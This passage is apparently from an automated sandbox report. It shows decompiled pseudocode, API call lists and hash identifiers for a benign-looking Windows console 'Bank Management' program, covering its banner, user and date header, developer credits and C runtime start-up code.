                                                                      					_t31 = _v8 + 1;
                                                                      					__eflags = _t31;
                                                                      					_v8 = _t31;
                                                                      				}
                                                                      				E00BE12B0(0x21, 0xb);
                                                                      				_push("Ravi Agrawal");
                                                                      				E00BE715C(_t28, _t32, _t33, __eflags);
                                                                      				E00BE12B0(0x21, 0xd);
                                                                      				_push("Sagar Sharma");
                                                                      				E00BE715C(_t28, _t32, _t33, __eflags);
                                                                      				E00BE12B0(0x21, 0xf);
                                                                      				_push("Sawal Maskey");
                                                                      				E00BE715C(_t28, _t32, _t33, __eflags);
                                                                      				E00BE12B0(0x18, 0x14);
                                                                      				_push("Press Any key to continue...");
                                                                      				return E00BE715C(_t28, _t32, _t33, __eflags);
                                                                      			}










                                                                      0x00be21e0
                                                                      0x00be21e0
                                                                      0x00be21ec
                                                                      0x00be21f5
                                                                      0x00be21fa
                                                                      0x00be21ff
                                                                      0x00be2204
                                                                      0x00be220b
                                                                      0x00be2210
                                                                      0x00be2222
                                                                      0x00be2222
                                                                      0x00be2226
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be2228
                                                                      0x00be222d
                                                                      0x00be2232
                                                                      0x00be2237
                                                                      0x00be221f
                                                                      0x00be221f
                                                                      0x00be2240
                                                                      0x00be2245
                                                                      0x00be224a
                                                                      0x00be224f
                                                                      0x00be2256
                                                                      0x00be225b
                                                                      0x00be226d
                                                                      0x00be226d
                                                                      0x00be2271
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be2273
                                                                      0x00be2278
                                                                      0x00be227d
                                                                      0x00be2282
                                                                      0x00be2267
                                                                      0x00be2267
                                                                      0x00be226a
                                                                      0x00be226a
                                                                      0x00be228b
                                                                      0x00be2290
                                                                      0x00be2295
                                                                      0x00be22a1
                                                                      0x00be22a6
                                                                      0x00be22ab
                                                                      0x00be22b7
                                                                      0x00be22bc
                                                                      0x00be22c1
                                                                      0x00be22cd
                                                                      0x00be22d2
                                                                      0x00be22e2

                                                                      APIs
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE139D
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE13DB
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE13FC
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE1470
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE1493
                                                                        • Part of subcall function 00BE12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D1
                                                                        • Part of subcall function 00BE12B0: SetConsoleCursorPosition.KERNEL32(00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D8
                                                                      • _wprintf.LIBCMT ref: 00BE21FF
                                                                      • _wprintf.LIBCMT ref: 00BE2232
                                                                        • Part of subcall function 00BE715C: __stbuf.LIBCMT ref: 00BE71A8
                                                                        • Part of subcall function 00BE715C: __output_s_l.LIBCMT ref: 00BE71C2
                                                                        • Part of subcall function 00BE715C: __ftbuf.LIBCMT ref: 00BE71D6
                                                                      • _wprintf.LIBCMT ref: 00BE224A
                                                                      • _wprintf.LIBCMT ref: 00BE227D
                                                                      • _wprintf.LIBCMT ref: 00BE2295
                                                                      • _wprintf.LIBCMT ref: 00BE22AB
                                                                      • _wprintf.LIBCMT ref: 00BE22C1
                                                                      • _wprintf.LIBCMT ref: 00BE22D7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225676586.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000000.00000002.225663040.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225715561.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225731360.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225744873.0000000000C01000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225752755.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _wprintf$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf
                                                                      • String ID: BANK MANAGEMENT //$Designed and Programmed by:$Press Any key to continue...$Ravi Agrawal$Sagar Sharma$Sawal Maskey
                                                                      • API String ID: 1778593935-2888666035
                                                                      • Opcode ID: 9c1522695654ab23e7f81f15102a43427ce169f31b1a6074af1375f489b141f3
                                                                      • Instruction ID: 5758903f799b420800a9b20caefa0008138f9cc5df8a39480563da264661640a
                                                                      • Opcode Fuzzy Hash: 9c1522695654ab23e7f81f15102a43427ce169f31b1a6074af1375f489b141f3
                                                                      • Instruction Fuzzy Hash: BA214D71AD438AB6F6247BDA5C03F6D32E05B11B44F2045F4B7053E2C2EBF1660862AB
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 66%
                                                                      			E00BE20E0(void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                      				intOrPtr _v8;
                                                                      				void* __ebp;
                                                                      				void* _t9;
                                                                      				intOrPtr _t16;
                                                                      				void* _t20;
                                                                      				void* _t24;
                                                                      				void* _t26;
                                                                      				void* _t27;
                                                                      				void* _t31;
                                                                      				void* _t37;
                                                                      
                                                                      				_t37 = __fp0;
                                                                      				_t23 = __esi;
                                                                      				_t22 = __edi;
                                                                      				E00BE1380(__edi, __esi, __eflags, 0, 0, 0x50, 0x17);
                                                                      				E00BE12B0(0x19, 1);
                                                                      				_push("Banking Management //");
                                                                      				E00BE715C(_t20, __edi, __esi, __eflags);
                                                                      				E00BE12B0(5, 3);
                                                                      				_t9 = E00BE8230(0xc02ee4, "Admin");
                                                                      				_t26 = _t24 + 0xc;
                                                                      				if(_t9 == 0) {
                                                                      					 *0xc02240 = 1;
                                                                      				}
                                                                      				_t34 =  *0xc02240;
                                                                      				if( *0xc02240 == 0) {
                                                                      					_push(0xc02ee4);
                                                                      					_push("Current User : %s");
                                                                      					E00BE715C(_t20, _t22, _t23, __eflags);
                                                                      					_t27 = _t26 + 8;
                                                                      				} else {
                                                                      					_push("Current User : Admin");
                                                                      					E00BE715C(_t20, _t22, _t23, _t34);
                                                                      					_t27 = _t26 + 4;
                                                                      				}
                                                                      				_push("\t\t\t\tDate : ");
                                                                      				E00BE715C(_t20, _t22, _t23, _t34);
                                                                      				E00BE834B(_t34, 0xc02f40);
                                                                      				_push(0xc02f40);
                                                                      				E00BE16A0(_t22, _t23, _t37);
                                                                      				_push(0xc02f40);
                                                                      				_push("%s");
                                                                      				E00BE715C(_t20, _t22, _t23, _t34);
                                                                      				E00BE834B(_t34, 0xc02f40);
                                                                      				_t31 = _t27 + 0x14;
                                                                      				_t16 = E00BE12B0(1, 5);
                                                                      				_v8 = 0;
                                                                      				while(1) {
                                                                      					_t35 = _v8 - 0x4e;
                                                                      					if(_v8 >= 0x4e) {
                                                                      						break;
                                                                      					}
                                                                      					_push(0xc4);
                                                                      					_push("%c");
                                                                      					E00BE715C(_t20, _t22, _t23, _t35);
                                                                      					_t31 = _t31 + 8;
                                                                      					_t16 = _v8 + 1;
                                                                      					_v8 = _t16;
                                                                      				}
                                                                      				return _t16;
                                                                      			}













                                                                      0x00be20e0
                                                                      0x00be20e0
                                                                      0x00be20e0
                                                                      0x00be20ec
                                                                      0x00be20f5
                                                                      0x00be20fa
                                                                      0x00be20ff
                                                                      0x00be210b
                                                                      0x00be211a
                                                                      0x00be211f
                                                                      0x00be2124
                                                                      0x00be2126
                                                                      0x00be2126
                                                                      0x00be2130
                                                                      0x00be2137
                                                                      0x00be2148
                                                                      0x00be214d
                                                                      0x00be2152
                                                                      0x00be2157
                                                                      0x00be2139
                                                                      0x00be2139
                                                                      0x00be213e
                                                                      0x00be2143
                                                                      0x00be2143
                                                                      0x00be215a
                                                                      0x00be215f
                                                                      0x00be216c
                                                                      0x00be2174
                                                                      0x00be2179
                                                                      0x00be217e
                                                                      0x00be2183
                                                                      0x00be2188
                                                                      0x00be2195
                                                                      0x00be219a
                                                                      0x00be21a1
                                                                      0x00be21a6
                                                                      0x00be21b8
                                                                      0x00be21b8
                                                                      0x00be21bc
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be21be
                                                                      0x00be21c3
                                                                      0x00be21c8
                                                                      0x00be21cd
                                                                      0x00be21b2
                                                                      0x00be21b5
                                                                      0x00be21b5
                                                                      0x00be21d5

                                                                      APIs
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE139D
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE13DB
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE13FC
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE1470
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE1493
                                                                        • Part of subcall function 00BE12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D1
                                                                        • Part of subcall function 00BE12B0: SetConsoleCursorPosition.KERNEL32(00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D8
                                                                      • _wprintf.LIBCMT ref: 00BE20FF
                                                                      • _wprintf.LIBCMT ref: 00BE213E
                                                                      • _wprintf.LIBCMT ref: 00BE2152
                                                                        • Part of subcall function 00BE715C: __stbuf.LIBCMT ref: 00BE71A8
                                                                        • Part of subcall function 00BE715C: __output_s_l.LIBCMT ref: 00BE71C2
                                                                        • Part of subcall function 00BE715C: __ftbuf.LIBCMT ref: 00BE71D6
                                                                      • _wprintf.LIBCMT ref: 00BE215F
                                                                      • __wstrtime.LIBCMT ref: 00BE216C
                                                                      • _wprintf.LIBCMT ref: 00BE2188
                                                                      • __wstrtime.LIBCMT ref: 00BE2195
                                                                      • _wprintf.LIBCMT ref: 00BE21C8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225676586.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000000.00000002.225663040.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225715561.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225731360.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225744873.0000000000C01000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225752755.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _wprintf$__wstrtime$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf
                                                                      • String ID: Date : $Admin$Banking Management //$Current User : %s$Current User : Admin$N
                                                                      • API String ID: 3817360410-644830535
                                                                      • Opcode ID: 3e68fafc65ca2aaf26337d5102ddfc126d2a7b193465bf89c5821b9573fb59e5
                                                                      • Instruction ID: 504a7c2ebaf74a2f7782dc2197ba6b98a3e0af884df793ab490f711db5a88ebf
                                                                      • Opcode Fuzzy Hash: 3e68fafc65ca2aaf26337d5102ddfc126d2a7b193465bf89c5821b9573fb59e5
                                                                      • Instruction Fuzzy Hash: 05115EB1BD438576E6147BD29C07F4D31A45B11B4AF2601F4FB08392C2EFF12618826B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 86%
                                                                      			E00BEA5E2(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                      				signed int _t81;
                                                                      				void* _t86;
                                                                      				long _t90;
                                                                      				signed int _t94;
                                                                      				signed int _t98;
                                                                      				signed int _t99;
                                                                      				signed char _t103;
                                                                      				signed int _t105;
                                                                      				intOrPtr _t106;
                                                                      				intOrPtr* _t109;
                                                                      				signed char _t111;
                                                                      				long _t119;
                                                                      				signed int _t130;
                                                                      				signed int _t134;
                                                                      				signed int _t135;
                                                                      				signed int _t138;
                                                                      				void** _t139;
                                                                      				signed int _t141;
                                                                      				void* _t142;
                                                                      				signed int _t143;
                                                                      				void** _t147;
                                                                      				signed int _t149;
                                                                      				void* _t150;
                                                                      				signed int _t154;
                                                                      				void* _t155;
                                                                      				void* _t160;
                                                                      
                                                                      				_push(0x64);
                                                                      				_push(0xbfd8c0);
                                                                      				E00BE9160(__ebx, __edi, __esi);
                                                                      				E00BEBE5F(0xb);
                                                                      				_t130 = 0;
                                                                      				 *(_t155 - 4) = 0;
                                                                      				_t160 =  *0xc02f60 - _t130; // 0x0
                                                                      				if(_t160 == 0) {
                                                                      					_push(0x40);
                                                                      					_t141 = 0x20;
                                                                      					_push(_t141);
                                                                      					_t81 = E00BEC55B();
                                                                      					_t134 = _t81;
                                                                      					 *(_t155 - 0x24) = _t134;
                                                                      					__eflags = _t134;
                                                                      					if(_t134 != 0) {
                                                                      						 *0xc02f60 = _t81;
                                                                      						 *0xc02f5c = _t141;
                                                                      						while(1) {
                                                                      							__eflags = _t134 - _t81 + 0x800;
                                                                      							if(_t134 >= _t81 + 0x800) {
                                                                      								break;
                                                                      							}
                                                                      							 *((short*)(_t134 + 4)) = 0xa00;
                                                                      							 *_t134 =  *_t134 | 0xffffffff;
                                                                      							 *(_t134 + 8) = _t130;
                                                                      							 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x00000080;
                                                                      							 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x0000007f;
                                                                      							 *((short*)(_t134 + 0x25)) = 0xa0a;
                                                                      							 *(_t134 + 0x38) = _t130;
                                                                      							 *(_t134 + 0x34) = _t130;
                                                                      							_t134 = _t134 + 0x40;
                                                                      							 *(_t155 - 0x24) = _t134;
                                                                      							_t81 =  *0xc02f60; // 0x0
                                                                      						}
                                                                      						GetStartupInfoW(_t155 - 0x74);
                                                                      						__eflags =  *((short*)(_t155 - 0x42));
                                                                      						if( *((short*)(_t155 - 0x42)) == 0) {
                                                                      							while(1) {
                                                                      								L31:
                                                                      								 *(_t155 - 0x2c) = _t130;
                                                                      								__eflags = _t130 - 3;
                                                                      								if(_t130 >= 3) {
                                                                      									break;
                                                                      								}
                                                                      								_t147 = (_t130 << 6) +  *0xc02f60;
                                                                      								 *(_t155 - 0x24) = _t147;
                                                                      								__eflags =  *_t147 - 0xffffffff;
                                                                      								if( *_t147 == 0xffffffff) {
                                                                      									L35:
                                                                      									_t147[1] = 0x81;
                                                                      									__eflags = _t130;
                                                                      									if(_t130 != 0) {
                                                                      										_t66 = _t130 - 1; // -1
                                                                      										asm("sbb eax, eax");
                                                                      										_t90 =  ~_t66 + 0xfffffff5;
                                                                      										__eflags = _t90;
                                                                      									} else {
                                                                      										_t90 = 0xfffffff6;
                                                                      									}
                                                                      									_t142 = GetStdHandle(_t90);
                                                                      									__eflags = _t142 - 0xffffffff;
                                                                      									if(_t142 == 0xffffffff) {
                                                                      										L47:
                                                                      										_t147[1] = _t147[1] | 0x00000040;
                                                                      										 *_t147 = 0xfffffffe;
                                                                      										_t94 =  *0xc03064;
                                                                      										__eflags = _t94;
                                                                      										if(_t94 != 0) {
                                                                      											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
                                                                      										}
                                                                      										goto L49;
                                                                      									} else {
                                                                      										__eflags = _t142;
                                                                      										if(_t142 == 0) {
                                                                      											goto L47;
                                                                      										}
                                                                      										_t98 = GetFileType(_t142);
                                                                      										__eflags = _t98;
                                                                      										if(_t98 == 0) {
                                                                      											goto L47;
                                                                      										}
                                                                      										 *_t147 = _t142;
                                                                      										_t99 = _t98 & 0x000000ff;
                                                                      										__eflags = _t99 - 2;
                                                                      										if(_t99 != 2) {
                                                                      											__eflags = _t99 - 3;
                                                                      											if(_t99 != 3) {
                                                                      												L46:
                                                                      												_t70 =  &(_t147[3]); // -12595028
                                                                      												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
                                                                      												_t147[2] = _t147[2] + 1;
                                                                      												L49:
                                                                      												_t130 = _t130 + 1;
                                                                      												continue;
                                                                      											}
                                                                      											_t103 = _t147[1] | 0x00000008;
                                                                      											__eflags = _t103;
                                                                      											L45:
                                                                      											_t147[1] = _t103;
                                                                      											goto L46;
                                                                      										}
                                                                      										_t103 = _t147[1] | 0x00000040;
                                                                      										goto L45;
                                                                      									}
                                                                      								}
                                                                      								__eflags =  *_t147 - 0xfffffffe;
                                                                      								if( *_t147 == 0xfffffffe) {
                                                                      									goto L35;
                                                                      								}
                                                                      								_t147[1] = _t147[1] | 0x00000080;
                                                                      								goto L49;
                                                                      							}
                                                                      							 *(_t155 - 4) = 0xfffffffe;
                                                                      							E00BEA8A6();
                                                                      							L2:
                                                                      							_t86 = 1;
                                                                      							L3:
                                                                      							return E00BE91A5(_t86);
                                                                      						}
                                                                      						_t105 =  *(_t155 - 0x40);
                                                                      						__eflags = _t105;
                                                                      						if(_t105 == 0) {
                                                                      							goto L31;
                                                                      						}
                                                                      						_t135 =  *_t105;
                                                                      						 *(_t155 - 0x1c) = _t135;
                                                                      						_t106 = _t105 + 4;
                                                                      						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
                                                                      						 *(_t155 - 0x20) = _t106 + _t135;
                                                                      						__eflags = _t135 - 0x800;
                                                                      						if(_t135 >= 0x800) {
                                                                      							_t135 = 0x800;
                                                                      							 *(_t155 - 0x1c) = 0x800;
                                                                      						}
                                                                      						_t149 = 1;
                                                                      						__eflags = 1;
                                                                      						 *(_t155 - 0x30) = 1;
                                                                      						while(1) {
                                                                      							__eflags =  *0xc02f5c - _t135; // 0x3
                                                                      							if(__eflags >= 0) {
                                                                      								break;
                                                                      							}
                                                                      							_t138 = E00BEC55B(_t141, 0x40);
                                                                      							 *(_t155 - 0x24) = _t138;
                                                                      							__eflags = _t138;
                                                                      							if(_t138 != 0) {
                                                                      								0xc02f60[_t149] = _t138;
                                                                      								 *0xc02f5c =  *0xc02f5c + _t141;
                                                                      								__eflags =  *0xc02f5c;
                                                                      								while(1) {
                                                                      									__eflags = _t138 - 0xc02f60[_t149] + 0x800;
                                                                      									if(_t138 >= 0xc02f60[_t149] + 0x800) {
                                                                      										break;
                                                                      									}
                                                                      									 *((short*)(_t138 + 4)) = 0xa00;
                                                                      									 *_t138 =  *_t138 | 0xffffffff;
                                                                      									 *(_t138 + 8) = _t130;
                                                                      									 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
                                                                      									 *((short*)(_t138 + 0x25)) = 0xa0a;
                                                                      									 *(_t138 + 0x38) = _t130;
                                                                      									 *(_t138 + 0x34) = _t130;
                                                                      									_t138 = _t138 + 0x40;
                                                                      									 *(_t155 - 0x24) = _t138;
                                                                      								}
                                                                      								_t149 = _t149 + 1;
                                                                      								 *(_t155 - 0x30) = _t149;
                                                                      								_t135 =  *(_t155 - 0x1c);
                                                                      								continue;
                                                                      							}
                                                                      							_t135 =  *0xc02f5c; // 0x3
                                                                      							 *(_t155 - 0x1c) = _t135;
                                                                      							break;
                                                                      						}
                                                                      						_t143 = _t130;
                                                                      						 *(_t155 - 0x2c) = _t143;
                                                                      						_t109 =  *((intOrPtr*)(_t155 - 0x28));
                                                                      						_t139 =  *(_t155 - 0x20);
                                                                      						while(1) {
                                                                      							__eflags = _t143 - _t135;
                                                                      							if(_t143 >= _t135) {
                                                                      								goto L31;
                                                                      							}
                                                                      							_t150 =  *_t139;
                                                                      							__eflags = _t150 - 0xffffffff;
                                                                      							if(_t150 == 0xffffffff) {
                                                                      								L26:
                                                                      								_t143 = _t143 + 1;
                                                                      								 *(_t155 - 0x2c) = _t143;
                                                                      								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
                                                                      								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
                                                                      								_t139 =  &(_t139[1]);
                                                                      								 *(_t155 - 0x20) = _t139;
                                                                      								continue;
                                                                      							}
                                                                      							__eflags = _t150 - 0xfffffffe;
                                                                      							if(_t150 == 0xfffffffe) {
                                                                      								goto L26;
                                                                      							}
                                                                      							_t111 =  *_t109;
                                                                      							__eflags = _t111 & 0x00000001;
                                                                      							if((_t111 & 0x00000001) == 0) {
                                                                      								goto L26;
                                                                      							}
                                                                      							__eflags = _t111 & 0x00000008;
                                                                      							if((_t111 & 0x00000008) != 0) {
                                                                      								L24:
                                                                      								_t154 = ((_t143 & 0x0000001f) << 6) + 0xc02f60[_t143 >> 5];
                                                                      								 *(_t155 - 0x24) = _t154;
                                                                      								 *_t154 =  *_t139;
                                                                      								 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
                                                                      								_t38 = _t154 + 0xc; // 0xd
                                                                      								InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
                                                                      								_t39 = _t154 + 8;
                                                                      								 *_t39 =  *(_t154 + 8) + 1;
                                                                      								__eflags =  *_t39;
                                                                      								_t139 =  *(_t155 - 0x20);
                                                                      								L25:
                                                                      								_t135 =  *(_t155 - 0x1c);
                                                                      								goto L26;
                                                                      							}
                                                                      							_t119 = GetFileType(_t150);
                                                                      							_t139 =  *(_t155 - 0x20);
                                                                      							__eflags = _t119;
                                                                      							if(_t119 == 0) {
                                                                      								goto L25;
                                                                      							}
                                                                      							goto L24;
                                                                      						}
                                                                      						goto L31;
                                                                      					}
                                                                      					E00BE96F0(_t155, 0xc01380, _t155 - 0x10, 0xfffffffe);
                                                                      					_t86 = 0;
                                                                      					goto L3;
                                                                      				}
                                                                      				E00BE96F0(_t155, 0xc01380, _t155 - 0x10, 0xfffffffe);
                                                                      				goto L2;
                                                                      			}





























                                                                      0x00bea5e2
                                                                      0x00bea5e4
                                                                      0x00bea5e9
                                                                      0x00bea5f0
                                                                      0x00bea5f6
                                                                      0x00bea5f8
                                                                      0x00bea5fb
                                                                      0x00bea601
                                                                      0x00bea621
                                                                      0x00bea625
                                                                      0x00bea626
                                                                      0x00bea627
                                                                      0x00bea62e
                                                                      0x00bea630
                                                                      0x00bea633
                                                                      0x00bea635
                                                                      0x00bea64e
                                                                      0x00bea653
                                                                      0x00bea659
                                                                      0x00bea65e
                                                                      0x00bea660
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bea662
                                                                      0x00bea668
                                                                      0x00bea66b
                                                                      0x00bea66e
                                                                      0x00bea677
                                                                      0x00bea67a
                                                                      0x00bea680
                                                                      0x00bea683
                                                                      0x00bea686
                                                                      0x00bea689
                                                                      0x00bea68c
                                                                      0x00bea68c
                                                                      0x00bea697
                                                                      0x00bea69d
                                                                      0x00bea6a2
                                                                      0x00bea7d1
                                                                      0x00bea7d1
                                                                      0x00bea7d1
                                                                      0x00bea7d4
                                                                      0x00bea7d7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bea7e2
                                                                      0x00bea7e8
                                                                      0x00bea7eb
                                                                      0x00bea7ee
                                                                      0x00bea803
                                                                      0x00bea803
                                                                      0x00bea807
                                                                      0x00bea809
                                                                      0x00bea810
                                                                      0x00bea815
                                                                      0x00bea817
                                                                      0x00bea817
                                                                      0x00bea80b
                                                                      0x00bea80d
                                                                      0x00bea80d
                                                                      0x00bea821
                                                                      0x00bea823
                                                                      0x00bea826
                                                                      0x00bea86d
                                                                      0x00bea873
                                                                      0x00bea876
                                                                      0x00bea87c
                                                                      0x00bea881
                                                                      0x00bea883
                                                                      0x00bea888
                                                                      0x00bea888
                                                                      0x00000000
                                                                      0x00bea828
                                                                      0x00bea828
                                                                      0x00bea82a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bea82d
                                                                      0x00bea833
                                                                      0x00bea835
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bea837
                                                                      0x00bea839
                                                                      0x00bea83e
                                                                      0x00bea841
                                                                      0x00bea84b
                                                                      0x00bea84e
                                                                      0x00bea859
                                                                      0x00bea85e
                                                                      0x00bea862
                                                                      0x00bea868
                                                                      0x00bea88f
                                                                      0x00bea88f
                                                                      0x00000000
                                                                      0x00bea88f
                                                                      0x00bea854
                                                                      0x00bea854
                                                                      0x00bea856
                                                                      0x00bea856
                                                                      0x00000000
                                                                      0x00bea856
                                                                      0x00bea847
                                                                      0x00000000
                                                                      0x00bea847
                                                                      0x00bea826
                                                                      0x00bea7f0
                                                                      0x00bea7f3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bea7fb
                                                                      0x00000000
                                                                      0x00bea7fb
                                                                      0x00bea895
                                                                      0x00bea89c
                                                                      0x00bea616
                                                                      0x00bea618
                                                                      0x00bea619
                                                                      0x00bea61e
                                                                      0x00bea61e
                                                                      0x00bea6a8
                                                                      0x00bea6ab
                                                                      0x00bea6ad
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bea6b3
                                                                      0x00bea6b5
                                                                      0x00bea6b8
                                                                      0x00bea6bb
                                                                      0x00bea6c0
                                                                      0x00bea6c8
                                                                      0x00bea6ca
                                                                      0x00bea6cc
                                                                      0x00bea6ce
                                                                      0x00bea6ce
                                                                      0x00bea6d3
                                                                      0x00bea6d3
                                                                      0x00bea6d4
                                                                      0x00bea6d7
                                                                      0x00bea6d7
                                                                      0x00bea6dd
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bea6e9
                                                                      0x00bea6eb
                                                                      0x00bea6ee
                                                                      0x00bea6f0
                                                                      0x00bea784
                                                                      0x00bea78b
                                                                      0x00bea78b
                                                                      0x00bea791
                                                                      0x00bea79d
                                                                      0x00bea79f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bea7a1
                                                                      0x00bea7a7
                                                                      0x00bea7aa
                                                                      0x00bea7ad
                                                                      0x00bea7b1
                                                                      0x00bea7b7
                                                                      0x00bea7ba
                                                                      0x00bea7bd
                                                                      0x00bea7c0
                                                                      0x00bea7c0
                                                                      0x00bea7c5
                                                                      0x00bea7c6
                                                                      0x00bea7c9
                                                                      0x00000000
                                                                      0x00bea7c9
                                                                      0x00bea6f6
                                                                      0x00bea6fc
                                                                      0x00000000
                                                                      0x00bea6fc
                                                                      0x00bea6ff
                                                                      0x00bea701
                                                                      0x00bea704
                                                                      0x00bea707
                                                                      0x00bea70a
                                                                      0x00bea70a
                                                                      0x00bea70c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bea712
                                                                      0x00bea714
                                                                      0x00bea717
                                                                      0x00bea771
                                                                      0x00bea771
                                                                      0x00bea772
                                                                      0x00bea778
                                                                      0x00bea779
                                                                      0x00bea77c
                                                                      0x00bea77f
                                                                      0x00000000
                                                                      0x00bea77f
                                                                      0x00bea719
                                                                      0x00bea71c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bea71e
                                                                      0x00bea720
                                                                      0x00bea722
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bea724
                                                                      0x00bea726
                                                                      0x00bea736
                                                                      0x00bea743
                                                                      0x00bea74a
                                                                      0x00bea74f
                                                                      0x00bea756
                                                                      0x00bea75e
                                                                      0x00bea762
                                                                      0x00bea768
                                                                      0x00bea768
                                                                      0x00bea768
                                                                      0x00bea76b
                                                                      0x00bea76e
                                                                      0x00bea76e
                                                                      0x00000000
                                                                      0x00bea76e
                                                                      0x00bea729
                                                                      0x00bea72f
                                                                      0x00bea732
                                                                      0x00bea734
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bea734
                                                                      0x00000000
                                                                      0x00bea70a
                                                                      0x00bea642
                                                                      0x00bea64a
                                                                      0x00000000
                                                                      0x00bea64a
                                                                      0x00bea60e
                                                                      0x00000000

                                                                      APIs
                                                                      • __lock.LIBCMT ref: 00BEA5F0
                                                                        • Part of subcall function 00BEBE5F: __mtinitlocknum.LIBCMT ref: 00BEBE71
                                                                        • Part of subcall function 00BEBE5F: EnterCriticalSection.KERNEL32(?,?,00BED668,0000000D,?,?,?,?,00BFDA28,00000008,00BED601,00000000,00000000,00BE8F04,00BF1E56,00000000), ref: 00BEBE8A
                                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 00BEA60E
                                                                      • __calloc_crt.LIBCMT ref: 00BEA627
                                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 00BEA642
                                                                      • GetStartupInfoW.KERNEL32(?,00BFD8C0,00000064), ref: 00BEA697
                                                                      • __calloc_crt.LIBCMT ref: 00BEA6E2
                                                                      • GetFileType.KERNEL32(00000001), ref: 00BEA729
                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00BEA762
                                                                      • GetStdHandle.KERNEL32(-000000F6), ref: 00BEA81B
                                                                      • GetFileType.KERNEL32(00000000), ref: 00BEA82D
                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(-00C02F54,00000FA0), ref: 00BEA862
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225676586.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000000.00000002.225663040.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225715561.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225731360.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225744873.0000000000C01000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225752755.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__lock__mtinitlocknum
                                                                      • String ID:
                                                                      • API String ID: 1456538442-0
                                                                      • Opcode ID: e59f81bd4fba2a734a36d5be8ed6afa0306c709c66ab92e753f4ea962bba7ff8
                                                                      • Instruction ID: cb7bf10139586f362cb8ad2ad9968357172092888a5ba7c6000558f23e76255a
